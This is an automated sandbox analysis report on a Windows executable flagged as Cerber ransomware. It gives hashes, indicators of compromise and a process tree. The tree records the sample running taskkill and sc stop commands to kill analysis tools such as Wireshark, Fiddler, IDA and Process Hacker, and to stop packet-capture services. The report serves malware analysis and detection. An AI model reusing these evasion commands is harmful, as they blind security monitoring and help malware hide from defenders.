cerber | 3555b6ac9ca1e6926230398f45510da70f809ce11a15111a33c962af7d9ff5ec

Resubmissions

18-02-2025 15:36

250218-s2ecessphn 8

18-02-2025 13:36

250218-qwfbes1kgj 10

Analysis

max time kernel
42s
max time network
68s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
18-02-2025 13:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tlxukw.exe
Size

1.0MB
MD5

82313dfe6f96318d2bad9d09e7da5992
SHA1

ef8a3174da2e86da4360d0b5629eb7fbf7b6e0e0
SHA256

3555b6ac9ca1e6926230398f45510da70f809ce11a15111a33c962af7d9ff5ec
SHA512

dc0fc8c6927fc856c3cd96604ba9891a67903520914c8a67b294f8c048dbc561e377b00fffeed78dc02d7915590b2afa2deec859994f080d46299a0f202a1640
SSDEEP

24576:ky14BInvdGh9DmvJhYRJhKK3mUqDH9BORt7orRnQxhLzhjzrue4D:ky14QU7DmvJ63mVwt7orRnQxhLNjzr8D

Score

10^/10

cerber defense_evasion execution persistence privilege_escalation ransomware

Malware Config

Signatures

Cerber 28 IoCs

Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

ransomware cerber

description	ioc	pid	Process
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
		1640	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
		3088	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
		2740	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
		5084	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		winxsrcsv64.EXE

Cerber family
cerber

Downloads MZ/PE file 4 IoCs

flow	pid	Process
17	2896	curl.exe
19	2868	curl.exe
20	4184	curl.exe
26	2580	curl.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 64 IoCs

pid	Process
4564	winxsrcsv64.EXE
2612	winxsrcsv64.EXE
3788	winxsrcsv64.EXE
380	winxsrcsv64.EXE
1580	winxsrcsv64.EXE
3812	winxsrcsv64.EXE
4416	winxsrcsv64.EXE
3020	winxsrcsv64.EXE
2396	winxsrcsv64.EXE
4932	winxsrcsv64.EXE
3052	winxsrcsv64.EXE
316	winxsrcsv64.EXE
700	winxsrcsv64.EXE
4936	winxsrcsv64.EXE
3036	winxsrcsv64.EXE
1272	winxsrcsv64.EXE
3580	winxsrcsv64.EXE
3464	winxsrcsv64.EXE
4964	winxsrcsv64.EXE
4328	winxsrcsv64.EXE
4552	winxsrcsv64.EXE
2076	winxsrcsv64.EXE
4856	winxsrcsv64.EXE
4352	winxsrcsv64.EXE
2312	Volumeid64.exe
3080	Volumeid64.exe
2652	Volumeid64.exe
1548	Volumeid64.exe
636	Volumeid64.exe
3808	Volumeid64.exe
4436	Volumeid64.exe
4296	Volumeid64.exe
4980	Volumeid64.exe
1372	Volumeid64.exe
3880	Volumeid64.exe
2408	Volumeid64.exe
312	Volumeid64.exe
4488	Volumeid64.exe
3800	Volumeid64.exe
3496	Volumeid64.exe
4600	Volumeid64.exe
1760	Volumeid64.exe
2656	Volumeid64.exe
2928	Volumeid64.exe
4532	Volumeid64.exe
1220	Volumeid64.exe
2508	Volumeid64.exe
4676	Volumeid64.exe
4564	winxsrcsv64.EXE
2612	winxsrcsv64.EXE
3788	winxsrcsv64.EXE
380	winxsrcsv64.EXE
1580	winxsrcsv64.EXE
3812	winxsrcsv64.EXE
4416	winxsrcsv64.EXE
3020	winxsrcsv64.EXE
2396	winxsrcsv64.EXE
4932	winxsrcsv64.EXE
3052	winxsrcsv64.EXE
316	winxsrcsv64.EXE
700	winxsrcsv64.EXE
4936	winxsrcsv64.EXE
3036	winxsrcsv64.EXE
1272	winxsrcsv64.EXE

Drops file in System32 directory 5 IoCs

description	ioc	Process
File created	C:\Windows\System32\Tasks\mac.bat	curl.exe
File created	C:\Windows\System32\Tasks\winxsrcsv64.EXE	curl.exe
File created	C:\Windows\System32\Tasks\winxsrcsv64.sys	curl.exe
File created	C:\Windows\System32\Tasks\iqvw64e.sys	curl.exe
File created	C:\Windows\System32\Tasks\Volumeid64.exe	curl.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
692	sc.exe
1632	sc.exe
5048	sc.exe
4728	sc.exe
724	sc.exe
1172	sc.exe
1472	sc.exe
612	sc.exe
3780	sc.exe
4024	sc.exe
4208	sc.exe
5096	sc.exe
4072	sc.exe
1652	sc.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Kills process with taskkill 26 IoCs

defense_evasion

pid	Process
2608	taskkill.exe
5036	taskkill.exe
1656	taskkill.exe
3088	taskkill.exe
2340	taskkill.exe
4908	taskkill.exe
2308	taskkill.exe
4948	taskkill.exe
2740	taskkill.exe
1640	taskkill.exe
1840	taskkill.exe
3552	taskkill.exe
2444	taskkill.exe
3220	taskkill.exe
3564	taskkill.exe
1944	taskkill.exe
4324	taskkill.exe
2520	taskkill.exe
4584	taskkill.exe
5084	taskkill.exe
1576	taskkill.exe
3052	taskkill.exe
2428	taskkill.exe
4896	taskkill.exe
376	taskkill.exe
1956	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe
448	tlxukw.exe

Suspicious behavior: LoadsDriver 48 IoCs

pid	Process
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1640	taskkill.exe
Token: SeDebugPrivilege	3088	taskkill.exe
Token: SeDebugPrivilege	2520	taskkill.exe
Token: SeDebugPrivilege	2428	taskkill.exe
Token: SeDebugPrivilege	4896	taskkill.exe
Token: SeDebugPrivilege	1840	taskkill.exe
Token: SeDebugPrivilege	4584	taskkill.exe
Token: SeDebugPrivilege	376	taskkill.exe
Token: SeDebugPrivilege	3552	taskkill.exe
Token: SeDebugPrivilege	2340	taskkill.exe
Token: SeDebugPrivilege	4908	taskkill.exe
Token: SeDebugPrivilege	2444	taskkill.exe
Token: SeDebugPrivilege	3220	taskkill.exe
Token: SeDebugPrivilege	2740	taskkill.exe
Token: SeDebugPrivilege	5084	taskkill.exe
Token: SeDebugPrivilege	1956	taskkill.exe
Token: SeDebugPrivilege	1576	taskkill.exe
Token: SeDebugPrivilege	3052	taskkill.exe
Token: SeDebugPrivilege	3564	taskkill.exe
Token: SeDebugPrivilege	2308	taskkill.exe
Token: SeDebugPrivilege	4948	taskkill.exe
Token: SeDebugPrivilege	1944	taskkill.exe
Token: SeDebugPrivilege	2608	taskkill.exe
Token: SeDebugPrivilege	4324	taskkill.exe
Token: SeDebugPrivilege	5036	taskkill.exe
Token: SeDebugPrivilege	1656	taskkill.exe
Token: SeIncreaseQuotaPrivilege	4496	WMIC.exe
Token: SeSecurityPrivilege	4496	WMIC.exe
Token: SeTakeOwnershipPrivilege	4496	WMIC.exe
Token: SeLoadDriverPrivilege	4496	WMIC.exe
Token: SeSystemProfilePrivilege	4496	WMIC.exe
Token: SeSystemtimePrivilege	4496	WMIC.exe
Token: SeProfSingleProcessPrivilege	4496	WMIC.exe
Token: SeIncBasePriorityPrivilege	4496	WMIC.exe
Token: SeCreatePagefilePrivilege	4496	WMIC.exe
Token: SeBackupPrivilege	4496	WMIC.exe
Token: SeRestorePrivilege	4496	WMIC.exe
Token: SeShutdownPrivilege	4496	WMIC.exe
Token: SeDebugPrivilege	4496	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4496	WMIC.exe
Token: SeRemoteShutdownPrivilege	4496	WMIC.exe
Token: SeUndockPrivilege	4496	WMIC.exe
Token: SeManageVolumePrivilege	4496	WMIC.exe
Token: 33	4496	WMIC.exe
Token: 34	4496	WMIC.exe
Token: 35	4496	WMIC.exe
Token: 36	4496	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4496	WMIC.exe
Token: SeSecurityPrivilege	4496	WMIC.exe
Token: SeTakeOwnershipPrivilege	4496	WMIC.exe
Token: SeLoadDriverPrivilege	4496	WMIC.exe
Token: SeSystemProfilePrivilege	4496	WMIC.exe
Token: SeSystemtimePrivilege	4496	WMIC.exe
Token: SeProfSingleProcessPrivilege	4496	WMIC.exe
Token: SeIncBasePriorityPrivilege	4496	WMIC.exe
Token: SeCreatePagefilePrivilege	4496	WMIC.exe
Token: SeBackupPrivilege	4496	WMIC.exe
Token: SeRestorePrivilege	4496	WMIC.exe
Token: SeShutdownPrivilege	4496	WMIC.exe
Token: SeDebugPrivilege	4496	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4496	WMIC.exe
Token: SeRemoteShutdownPrivilege	4496	WMIC.exe
Token: SeUndockPrivilege	4496	WMIC.exe
Token: SeManageVolumePrivilege	4496	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 448 wrote to memory of 5116	448	tlxukw.exe	89
PID 448 wrote to memory of 5116	448	tlxukw.exe	89
PID 5116 wrote to memory of 1640	5116	cmd.exe	90
PID 5116 wrote to memory of 1640	5116	cmd.exe	90
PID 448 wrote to memory of 4860	448	tlxukw.exe	92
PID 448 wrote to memory of 4860	448	tlxukw.exe	92
PID 4860 wrote to memory of 3088	4860	cmd.exe	93
PID 4860 wrote to memory of 3088	4860	cmd.exe	93
PID 448 wrote to memory of 4956	448	tlxukw.exe	94
PID 448 wrote to memory of 4956	448	tlxukw.exe	94
PID 4956 wrote to memory of 724	4956	cmd.exe	95
PID 4956 wrote to memory of 724	4956	cmd.exe	95
PID 448 wrote to memory of 3924	448	tlxukw.exe	96
PID 448 wrote to memory of 3924	448	tlxukw.exe	96
PID 3924 wrote to memory of 2520	3924	cmd.exe	97
PID 3924 wrote to memory of 2520	3924	cmd.exe	97
PID 448 wrote to memory of 772	448	tlxukw.exe	98
PID 448 wrote to memory of 772	448	tlxukw.exe	98
PID 772 wrote to memory of 2428	772	cmd.exe	99
PID 772 wrote to memory of 2428	772	cmd.exe	99
PID 448 wrote to memory of 3348	448	tlxukw.exe	100
PID 448 wrote to memory of 3348	448	tlxukw.exe	100
PID 3348 wrote to memory of 4896	3348	cmd.exe	101
PID 3348 wrote to memory of 4896	3348	cmd.exe	101
PID 448 wrote to memory of 676	448	tlxukw.exe	102
PID 448 wrote to memory of 676	448	tlxukw.exe	102
PID 676 wrote to memory of 1840	676	cmd.exe	103
PID 676 wrote to memory of 1840	676	cmd.exe	103
PID 448 wrote to memory of 1248	448	tlxukw.exe	104
PID 448 wrote to memory of 1248	448	tlxukw.exe	104
PID 1248 wrote to memory of 4584	1248	cmd.exe	105
PID 1248 wrote to memory of 4584	1248	cmd.exe	105
PID 448 wrote to memory of 2896	448	tlxukw.exe	106
PID 448 wrote to memory of 2896	448	tlxukw.exe	106
PID 2896 wrote to memory of 376	2896	cmd.exe	107
PID 2896 wrote to memory of 376	2896	cmd.exe	107
PID 448 wrote to memory of 4544	448	tlxukw.exe	108
PID 448 wrote to memory of 4544	448	tlxukw.exe	108
PID 4544 wrote to memory of 3552	4544	cmd.exe	109
PID 4544 wrote to memory of 3552	4544	cmd.exe	109
PID 448 wrote to memory of 5004	448	tlxukw.exe	110
PID 448 wrote to memory of 5004	448	tlxukw.exe	110
PID 5004 wrote to memory of 2340	5004	cmd.exe	111
PID 5004 wrote to memory of 2340	5004	cmd.exe	111
PID 448 wrote to memory of 3740	448	tlxukw.exe	112
PID 448 wrote to memory of 3740	448	tlxukw.exe	112
PID 3740 wrote to memory of 4908	3740	cmd.exe	113
PID 3740 wrote to memory of 4908	3740	cmd.exe	113
PID 448 wrote to memory of 3196	448	tlxukw.exe	114
PID 448 wrote to memory of 3196	448	tlxukw.exe	114
PID 3196 wrote to memory of 2444	3196	cmd.exe	115
PID 3196 wrote to memory of 2444	3196	cmd.exe	115
PID 448 wrote to memory of 1120	448	tlxukw.exe	116
PID 448 wrote to memory of 1120	448	tlxukw.exe	116
PID 1120 wrote to memory of 3220	1120	cmd.exe	117
PID 1120 wrote to memory of 3220	1120	cmd.exe	117
PID 448 wrote to memory of 3512	448	tlxukw.exe	118
PID 448 wrote to memory of 3512	448	tlxukw.exe	118
PID 3512 wrote to memory of 1172	3512	cmd.exe	119
PID 3512 wrote to memory of 1172	3512	cmd.exe	119
PID 448 wrote to memory of 4180	448	tlxukw.exe	120
PID 448 wrote to memory of 4180	448	tlxukw.exe	120
PID 4180 wrote to memory of 692	4180	cmd.exe	121
PID 4180 wrote to memory of 692	4180	cmd.exe	121

C:\Users\Admin\AppData\Local\Temp\tlxukw.exe
"C:\Users\Admin\AppData\Local\Temp\tlxukw.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5116
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4860
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4956
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3924
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:772
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3348
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:676
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1248
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4544
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5004
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3740
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3196
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1120
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3512
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:1172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4180
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    PID:692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:4708
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    - Launches sc.exe
    PID:4072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:1220
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:4024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:1028
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    PID:612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:380
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:1632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:4444
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4036
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:4684
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:1652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2296
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4932
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4432
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3992
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3760
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T >nul 2>&1
  2⤵
  PID:824
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4548
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4100
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4328
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4668
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5036
